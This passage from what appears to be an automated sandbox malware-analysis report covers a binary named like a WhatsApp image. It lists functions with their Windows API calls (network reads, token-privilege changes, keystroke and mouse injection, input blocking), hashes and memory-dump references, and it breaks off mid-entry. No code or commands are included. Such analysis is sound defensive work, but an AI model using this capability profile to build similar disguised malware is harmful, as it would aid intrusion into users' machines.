Instruction Fuzzy Hash: 6FD0A7304007129FCB31AFA1FC0961276D5AB04301F188429E4C1D25A0FBF4CCC08650

Function 000C13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 000C13DC

Strings

(, xrefs: 000C1422
|, xrefs: 000C140C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: fa8a3e9911030b5596ed1b4c6d75a0021293980280243a9aac0242d925149be9
Instruction ID: 528440eac43490d8bcdb42a89a9426593c38d58c7c7e45f462fe97e5fecc5229
Opcode Fuzzy Hash: fa8a3e9911030b5596ed1b4c6d75a0021293980280243a9aac0242d925149be9
Instruction Fuzzy Hash: 76321475A046059FCB28CF69C480EAAB7F0FF49320B15C56EE59ADB3A2D770E941CB44

Function 0009B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0009B22F

Part of subcall function 0009B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0009B5A5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 357e3614c41f74d56b5eae659865f0b78d62e719ab94dbf8034664b4224d49a8
Instruction ID: 7220eb3c1a005216183d0a179d6e36d9ee5d7b04787a99644b1789a4b0ab3ef8
Opcode Fuzzy Hash: 357e3614c41f74d56b5eae659865f0b78d62e719ab94dbf8034664b4224d49a8
Instruction Fuzzy Hash: 15A17B70114149BADF78AF6ABE88EBF39DDEB42760B50411DF501E29B3CB149D00B272

Function 000D4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000D43BF,00000000), ref: 000D4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000D4FD2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 58aa558d3c6d7fcdffdfbab08b1d7e957b29fa5f8fc8a5e1fa725f2b01694ae5
Instruction ID: d6e186ba5dd68b03dfc885829a068292add6d929a42b1aa8fab1dad6413a5046
Opcode Fuzzy Hash: 58aa558d3c6d7fcdffdfbab08b1d7e957b29fa5f8fc8a5e1fa725f2b01694ae5
Instruction Fuzzy Hash: D141C371504709BFEB209F94DC85EBFB7FCEB40759F10402BF605A6291EA719E4196B0

Function 000CE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000CE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 000CE2B4

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 0e657a1e34d76032e08672d895af5918179c2ccdb929c5277b0747635cabe3fa
Instruction ID: 4a7796efe4930f4ef5f22f7c25b900d7e8cb5d7d8b3d139c332056ba87e30333
Opcode Fuzzy Hash: 0e657a1e34d76032e08672d895af5918179c2ccdb929c5277b0747635cabe3fa
Instruction Fuzzy Hash: BC213C75A00118EFDB00EFA5D885EEDFBB8FF48314F0484A9E945A7252DB319945CB50

Function 000BB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
GetLastError.KERNEL32 ref: 000BB1BA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 04f4546dd4a1c25380a2d4ddc72ca3cd4e36490dd5c317341c75e952b8574e5d
Instruction ID: 90611cf94123f7d3462baad57d5b754d23dc19effd26130c979cce03fbc9d63a
Opcode Fuzzy Hash: 04f4546dd4a1c25380a2d4ddc72ca3cd4e36490dd5c317341c75e952b8574e5d
Instruction Fuzzy Hash: 2F118FB1504605AFE7189F68EC85D6BB7BDFB44710B20892EF49697641DBB0FC418B60

Function 000C6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000C6623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000C6664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000C666F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 9e38f871302a17c5e7e67a276de3869e14bd4740db456a882ca7a8ccf27f8d55
Instruction ID: 16f53287f4cf59eff0086d1912c0dcbe0caa2980b8fb77099adc3d72b3bbe672
Opcode Fuzzy Hash: 9e38f871302a17c5e7e67a276de3869e14bd4740db456a882ca7a8ccf27f8d55
Instruction Fuzzy Hash: 9F111271E01228BFDB108F95DC45FAEBBFCEB45710F104155F900E7290D7B15A058BA5

Function 000C71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000C7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000C723A
FreeSid.ADVAPI32(?), ref: 000C724A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ec122a4ed30714feb4e5696760773bedf4a89828dea0ba888dd80b901247c307
Instruction ID: d74c9aa4a053ae408789c38875a7c99a1ff60873a576341bb7bd2d66f20505b3
Opcode Fuzzy Hash: ec122a4ed30714feb4e5696760773bedf4a89828dea0ba888dd80b901247c307
Instruction Fuzzy Hash: 31F01D76A04209BFDF04DFE4DD89EEEBBB8EF08201F104469B606E2591E2709A448B10

Function 000CF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000CF599
FindClose.KERNEL32(00000000), ref: 000CF5C9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c60176f95fbf315dd554f2ecaf5a5269479e97832b0fc5536ca72fce2f257e85
Instruction ID: 48c5b87a1a6713652d2cb60dd8edd680e45753dc59ea4a9c3567a91fabc202c8
Opcode Fuzzy Hash: c60176f95fbf315dd554f2ecaf5a5269479e97832b0fc5536ca72fce2f257e85
Instruction Fuzzy Hash: A711A1726006009FDB10EF28D845E6EB3E9FF98324F00895EF9A9D7291CB70E9018B81

Function 000CCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,000DBE6A,?,?,00000000,?), ref: 000CCEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,000DBE6A,?,?,00000000,?), ref: 000CCEB9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 96a1511786418f200f1e888da2a4ca0842ad78ba39efe61aaa00f15d5366f7c3
Instruction ID: 76abceb3f3908b19b91e575a149989f4a13d983fed2f9939faa243f932e3920b
Opcode Fuzzy Hash: 96a1511786418f200f1e888da2a4ca0842ad78ba39efe61aaa00f15d5366f7c3
Instruction Fuzzy Hash: 4EF08275100229ABEB20ABE4DC49FEE776DBF09391F004166F959D6181D7709A40CBA4

Function 000C411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000C4153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 000C4166

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: e7a5ab19187257ddb031508dc40da613b6e6647b4137ebcd3d6873ffeced98c7
Instruction ID: 6128aff8e51329f4da7b7f2b8075da3f077e7ff190f5ad942c9af82c56cc5d33
Opcode Fuzzy Hash: e7a5ab19187257ddb031508dc40da613b6e6647b4137ebcd3d6873ffeced98c7
Instruction Fuzzy Hash: CBF0677080024DAFDB159FA0CC05BBE7FB0FF00305F04800AFDA6A6192D7B986529FA0

Function 000BAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000BACC0), ref: 000BAB99
CloseHandle.KERNEL32(?,?,000BACC0), ref: 000BABAB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 33a5af5befce3c5077f04efc1e32b53866659fc839ae673daf3e31911ae057af
Instruction ID: 04b3961ea278440d75af0226e5526031f614d9fa705b132e83795be24ba03d1f
Opcode Fuzzy Hash: 33a5af5befce3c5077f04efc1e32b53866659fc839ae673daf3e31911ae057af
Instruction Fuzzy Hash: 89E0BF71000511AFEB252F54FC05DB77BE9EB04320711C529B59981871DB625C90AB50

Function 000A81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,000A6DB3,-0000031A,?,?,00000001), ref: 000A81B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000A81BA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 93d80ab62ea56700c298466afcf2668294115795aab7fde65f85abf1535e82fe
Instruction ID: 684153c2a5f497eedbaccde46d546351dda4dde0bba9572b153a1b63fc106902
Opcode Fuzzy Hash: 93d80ab62ea56700c298466afcf2668294115795aab7fde65f85abf1535e82fe
Instruction Fuzzy Hash: 0FB092B1044608ABDB002BE1FC0AB587F68FB08652F004010F64D488618BB254908A92

Function 000877B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00087921

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 92aaf53f8a4859addbeaf153355f5e84d15fa1a55d6783f634cf519969d7486d
Instruction ID: 6165970ba9b2eed305f0c3b21d69299c5810e2f478dbfe35623a7d2fd27a36d8
Opcode Fuzzy Hash: 92aaf53f8a4859addbeaf153355f5e84d15fa1a55d6783f634cf519969d7486d
Instruction Fuzzy Hash: D9A24A70A04219DFCB24DF58C8807ADBBB1FF48314F2581A9E899AB395D7749E81DF90

Function 00093B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00094176

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: b19df0b7a086c65f8faf602341238f6aee4ae5a0a947664c9c4ac37e9cb61dff
Instruction ID: bfe3db54d5d0fd55ce428daf3d8714d863ab40d77f45336b9b0e961e9dc7ebda
Opcode Fuzzy Hash: b19df0b7a086c65f8faf602341238f6aee4ae5a0a947664c9c4ac37e9cb61dff
Instruction Fuzzy Hash: DA728C74E042099BCF24DF94C491EBEB7B5FF48300F14806AE919AB292D771AE45EB91

Function 000AD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0395582fb1771c097f09b00db73d56d6778fb4ceb4116c699dc66c2faa6f8c21
Instruction ID: e521fee8e160b0960b334302af2041a542d41809ad3ae42fc996fe01e9489f4e
Opcode Fuzzy Hash: 0395582fb1771c097f09b00db73d56d6778fb4ceb4116c699dc66c2faa6f8c21
Instruction Fuzzy Hash: 7E320322D29F014DD7679634D92233AA299AFB73D4F15D727E81AB5DAAEF38C4C34100

Function 000896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: f70046d75eb2281a9f4a68017997b58c2a9826eb45d4ac0879050b89ef0609c5
Instruction ID: 03076911e19319465a6c679be34300797d9ab1688beadbf16afc01427f3afb5c
Opcode Fuzzy Hash: f70046d75eb2281a9f4a68017997b58c2a9826eb45d4ac0879050b89ef0609c5
Instruction Fuzzy Hash: DF2275716083059FD724EF24C891BAFB7E4BF84310F14492DF99A9B292DB71E944DB82

Function 000B038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b286995506598a3f4a2c450069638b6ee71839cfa854679f334176c992c58261
Instruction ID: 794cf5d6216faa8d63e04cf173aad1186727493aba2f3794920b4aacab0de259
Opcode Fuzzy Hash: b286995506598a3f4a2c450069638b6ee71839cfa854679f334176c992c58261
Instruction Fuzzy Hash: C1B1DF20D2AF518DD32396798931336B65DAFFB2D5B91D71BFC2A74D22EB2185C34180

Function 000CB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 000CB6DF

Part of subcall function 000A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,000CBDC3,00000000,?,?,?,?,000CBF70,00000000,?), ref: 000A3453
Part of subcall function 000A344A: __aulldiv.LIBCMT ref: 000A3473

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 22898dd8dda82526e5d36144b563bbf7db4347ae0b390a9d23b4c87c74ec3c58
Instruction ID: dc2cd68d2c53ffd86065f0b7ec943c73894531a08cde661421aa3d380c595186
Opcode Fuzzy Hash: 22898dd8dda82526e5d36144b563bbf7db4347ae0b390a9d23b4c87c74ec3c58
Instruction Fuzzy Hash: 6C21DF766345108BC729CF28C881B96B7E0EB95310B248E6CE4E5CB2D0CB38BA45CB54

Function 000D6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 000D6ACA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: efead55d66058264c1e31d3f9bf1bc8f677ebeffc9f3d75bfd4c12a94656bb44
Instruction ID: 327dfea28ba216b76649542f7a49b62e65267facf7e2f3511029764572075ce2
Opcode Fuzzy Hash: efead55d66058264c1e31d3f9bf1bc8f677ebeffc9f3d75bfd4c12a94656bb44
Instruction Fuzzy Hash: 8FE01A3A200204AFC740EBA9D80499AB7ECAFB8751F058427E985D7391DAB1E8449BA1

Function 000C74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 000C74DE

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
